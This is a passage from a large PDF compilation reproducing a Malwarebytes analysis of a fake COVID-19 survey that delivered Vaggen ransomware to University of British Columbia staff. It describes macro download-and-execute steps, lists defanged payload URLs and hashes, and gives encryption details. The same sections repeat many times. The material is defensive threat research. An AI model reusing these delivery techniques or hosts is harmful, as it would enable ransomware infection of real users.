12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 455 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 456 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 457 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 458 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 459 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 460 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 461 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 462 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 463 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 464 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 465 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 466 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 467 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 468 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 469 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 470 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 471 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 472 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 473 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 474 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 475 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 476 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 477 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 478 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 479 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 480 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 481 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 482 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 483 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 484 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 485 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 486 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 487 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 488 of 